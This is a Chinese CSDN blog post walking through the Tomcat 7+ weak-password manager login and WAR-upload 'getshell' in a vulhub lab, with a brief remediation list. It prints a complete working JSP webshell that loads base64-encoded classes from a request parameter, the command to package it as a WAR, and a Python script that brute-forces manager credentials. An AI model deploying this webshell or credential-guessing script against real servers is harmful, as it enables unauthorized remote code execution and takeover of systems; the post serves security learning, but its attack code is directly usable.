Tomcat7+ 弱口令 && 后台getshell漏洞

最新推荐文章于 2024-05-31 11:03:01 发布
最新推荐文章于 2024-05-31 11:03:01 发布
阅读量797 收藏 19
点赞数 16
分类专栏: python武器库 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45653478/article/details/138706845
版权

1 漏洞背景

Tomcat 是一个流行的开源Web应用服务器,用于部署和运行Java Web应用程序。Tomcat 7+ 版本中存在一个安全隐患,即默认的管理员密码可能较弱或者未被修改,攻击者可以利用这一漏洞登录到Tomcat的管理后台,并上传恶意的WAR包来执行任意代码

2 启动vulhub靶场

进入目录
 cd vulhub/tomcat/tomcat8
启动漏洞环境
docker compose up -d
查看端口
docker-ompose ps

访问 ,您将看到页面,表示环境正在成功运行。

3 漏洞复现步骤

点击Manager App即可跳到管理登陆页面

输入用户名密码 tomcat:tomcat,来到管理界面

登录到后台后可以通过部署war包进行getshell

找一个a.jsp木马

<%-- 使用时请删除此行, 连接密码: cmd --%>
<%!
class NATURAL extends ClassLoader{
  NATURAL(ClassLoader c){super(c);}
  public Class proper(byte[] b){
    return super.defineClass(b, 0, b.length);
  }
}
public byte[] tuple(String str) throws Exception {
  Class base64;
  byte[] value = null;
  try {
    base64=Class.forName("sun.misc.BASE64Decoder");
    Object decoder = base64.newInstance();
    value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
  } catch (Exception e) {
    try {
      base64=Class.forName("java.util.Base64");
      Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
      value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
    } catch (Exception ee) {}
  }
  return value;
}
%>
<%
String cls = request.getParameter("cmd");
if (cls != null) {
  new NATURAL(this.getClass().getClassLoader()).proper(tuple(cls)).newInstance().equals(new Object[]{request,response});
}
%>
​

打包成war

jar cvf tomcat.war a.jsp

上传打包的tomcat.war

生成一个tomcat的路径

在地址栏路径中访问http://192.168.1.20:8080/tomcat/a.jsp

蚁剑连接,密码cmd

4 修复方案

  1. 修改默认密码:确保Tomcat的管理后台使用了强密码,并定期更换密码。

  2. 限制访问权限:限制对Tomcat管理后台的访问权限,只允许可信的IP地址或网络段进行访问。

  3. 禁用不必要的模块:禁用Tomcat中不必要的模块和功能,减少潜在的安全风险。

  4. 定期更新和打补丁:定期更新Tomcat服务器和相关的Java环境,及时修复已知的安全漏洞。

  5. 使用Web应用防火墙(WAF):在Tomcat服务器前部署Web应用防火墙(WAF),对传入的请求进行过滤和检测,防止恶意请求的执行。

5 使用python脚本探测漏洞

弱口令脚本

#!/usr/bin/env python  
  
import requests  
import base64  
  
def tomcat_weak_password():  
    """  
    检查 Tomcat 服务器是否存在弱密码。  
    """  
    # 输入目标 IP 地址(注意:这里应该是一个完整的 URL,如 http://192.168.1.1:8080/manager/)  
    url = input("请输入目标IP地址(包含端口和路径,如 http://IP:PORT/manager/): ")  
      
    # 常见的用户名列表  
    users = ['tomcat','admin','system','Administrator','root','123','tomcat']  
      
    # 常见的密码列表  
    passwords = ['12345','123','tomcat','admin','00000','tomcat']  
      
    # 遍历用户名和密码列表  
    for user in users:  
        for password in passwords:  
            # 拼接用户名和密码,并转换为 base64 编码  
            tomcat_passwd = user.strip() + ':' + password.strip()  
            encoded_password = base64.b64encode(tomcat_passwd.encode('utf-8'))  
              
            # 将 base64 编码的密码转换为字符串,并添加 'Basic ' 前缀  
            encoded_password_end = 'Basic ' + str(encoded_password, 'utf-8')  
              
            # 构造请求头  
            headers = {  
                'Content-Type': 'application/x-www',  # 注意:这里的内容类型可能不正确,Tomcat 管理页面可能不需要这个  
                'Authorization': encoded_password_end,  
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36'  
            }  
              
            # 发送 GET 请求  
            response = requests.get(url, headers=headers)  
              
            # 如果返回状态码为 200,则认为存在弱口令  
            if response.status_code == 200:  
                print('存在弱口令')  
                print('账号', user)  
                print('密码', password)  
                # 当找到一个弱密码后,立即退出循环  
                break  
  
# 调用函数  
tomcat_weak_password()

结果

乐队1
关注
  • 16
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Tomcat弱口令扫描的工具.zip
03-31
Tomcat弱口令扫描工具,可自己写字典进行爆破。
Tomcat弱口令扫描器
05-08
弱口令扫描的工具有很多中,而在这其中,比较优秀的一款就是Tomcat,用起来很方便。希望上传给大家共享,也为了以后自己方便查找。
Tomcat弱口令及war包漏洞复现(保姆级教程)
m0_69043895的博客
04-21 923
这里我们采用针对同一弱口令去爆破不同账号的方式进行猜解,将可能存在的username放入position1的位置,其次放置password在position3的位置,最后attack时爆破的顺序如下图,就不会针对同一账号锁定。CSDN上有个脚本利用的是占满tomcat缓存的方式绕过,当同一账号大于5次登录,就会采用脏数据去进行登录,直到缓存占满后,又会用剩下的可能存在的username进行登录。链接的地址是 /zip文件的前缀/文件名,比如我这里就是http://IP/shell/shell.jsp。
Tomcat弱口令扫描工具
07-18
Tomcat弱口令扫描工具,可自己写字典进行爆破。
Tomcat 弱口令 && 后台getshell漏洞
weixin_46601374的博客
04-05 7497
漏洞编号 VUL-2021040008 爆发时间 2018-10-10 漏洞简介 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 影响版本 Tomcat8.x,Tomcat7.x 漏洞详情 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+权限分为: manager(后台管理) 1、manager-gui 拥
Tomcat管理页面弱口令页面Getshell
weixin_45253622的博客
03-06 4754
Tomcat管理页面弱口令页面Getshell 传送门 Tomcat安装完成后,点击页面的 Manager App 处会弹出输入用户名和密码的认证框。 我们也可以直接访问:http://127.0.0.1:8080/manager/html 来访问该管理页面。 但是默认情况下,该页面只允许 tomcat 本机访问,其他主机访问时会显示403。 这时,只需要修改 webapps\manager\META-INF\context.xml 文件,注释下如下行即可。 此时,需要我们输入用户名和密码进行登录
漏洞复现】Apache_Tomcat7+ 弱口令 && 后台getshell漏洞
过期的秋刀鱼
11-04 974
这些权限的究竟有什么作用,详情阅读 http://tomcat.apache.org/tomcat-8.5-doc/manager-howto.html。正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击。Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限。可见,用户tomcat拥有上述所有权限,密码是。即可跳到管理登陆页面。
Tomcat7 +弱口令&&后端Getshell漏洞
ssrf
03-14 1122
Tomcat版本:8.0 漏洞介绍: 介绍 Tomcat支持通过后端部署war文件,因此我们可以直接将webshel​​l放置到web目录中。为了访问后端,需要权限。 Tomcat7+权限分为: manager(后台管理) manager-gui 拥有html页面权限 manager-status 拥有查看status的权限 manager-script 拥有text接口的权限,和status权限 manager-jmx 拥有jmx权限,和status权限 host-manager(虚拟主机管理) a
nginx+tomcat7+memcached session会话保持
08-09
基于tomcat7版本的memcached会话保持,内置tomcat需要的jar包。
Tomcat7+Redis+Session 负载之后session 共享 tomcat jar包
04-11
nignx 进行负载后session失效的完美解决,亲测可用
Tomcat7+8+9
04-09
Tomcat7+8+9Tomcat7+8+9Tomcat7+8+9Tomcat7+8+9Tomcat7+8+9Tomcat7+8+9
tomcat7+redis单点 session共享jar
03-20
tomcat7 + redis单点 session共享 jar 提供支持tomcat7 + redis单点 实现session共享的jar资源
漏洞复现 - - -Tomcat弱口令漏洞
weixin_67503304的博客
08-07 7183
通过弱口令的方法爆破tomcat漏洞,通过上传war包拿到shell,简单的弱口令漏洞复现。
Tomcat后台管理漏洞复现(弱口令+上传webshell)_tomcat文件上传漏洞复现
2301_78398209的博客
04-14 777
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
中间件:tomcat弱口令
zh的博客
10-15 1294
靶场地址:http://www.whalwl.site:18081 解题准备:弱口令、准备asp、jsp马 解题思路: 1、进入网站默认登录地址,使用弱口令tomcat tomcat登录后台 http://www.whalwl.site:18081/manager/html 2、在war上传点上传一句话,要求是.war后缀 3、第一次使用asp木马,虽然能够连接但似乎没有权限,无法读取文件 4、第二次使用jsp木马,网上复制一个蚁剑的,密码是passwd <%! cl.
【网络安全的神秘世界】docker搭建pikachu靶场
weixin_54750312的博客
05-31 460
再访问80端口,因为默认端口就是80,所以80可省略。可以通过下面命令进入pikachu网站根目录。虽然是404,但实际已经启动好了。点击红色部分,进行安装/初始化。复制命令后,去kali安装。访问本地地址8080端口。
【网络安全的神秘世界】在win11搭建pikachu靶场
最新发布
weixin_54750312的博客
05-31 772
这个错误发生在mysql 5.7 版本及以上版本会出现的问题,在mysql5.7版本默认的sql配置是:sql_mode=“ONLY_FULL_GROUP_BY”,这个配置严格执行了"SQL92标准",很多从5.6升级到5.7时,为了语法兼容,大部分都会选择调整sql_mode,使其保持跟5.6一致,为了尽量兼容程序。访问http://pikachu/install.php,这是pikachu自带的初始化数据库的php文件。ok,重新访问首页(index.php),进行测试,成功解决。点击“安装/初始化”
HFish蜜罐管理端搭建:构建网络安全的主动防御系统
weixin_43822401的博客
05-29 933
HFish是一款开源的蜜罐系统,它通过模拟各种网络服务和应用,吸引攻击者进行攻击,从而实现对攻击行为的捕获、分析和溯源。欺骗防御:通过模拟各种服务和应用,欺骗攻击者,转移攻击者的视线。主动防御:主动诱捕攻击者,收集攻击信息,为安全防护提供决策支持。溯源反制:通过技术手段,追踪攻击者的身份和来源,为反制提供依据。灵活部署:支持多种部署方式,包括单机部署、分布式部署等。
tomcat弱口令复现
09-23
Tomcat的管理后台可以通过在Tomcat安装目录下的conf/tomcat-users.xml文件中配置用户名和密码来进行访问。然而,由于管理员为了方便经常使用弱口令,这就导致了Tomcat存在弱口令安全风险。当Tomcat后台管理用户存在弱口令时,攻击者可以利用这个漏洞来上传webshell并实施攻击。 要复现Tomcat弱口令漏洞,可以按照以下步骤进行操作: 1. 找到Tomcat安装目录下的conf/tomcat-users.xml文件。 2. 使用文本编辑器打开tomcat-users.xml文件。 3. 查找并找到带有用户名和密码的<user>元素。 4. 确认用户名和密码是否为弱口令,例如“admin/admin”。 5. 如果发现弱口令,请及时修改密码,确保使用强密码来提高安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值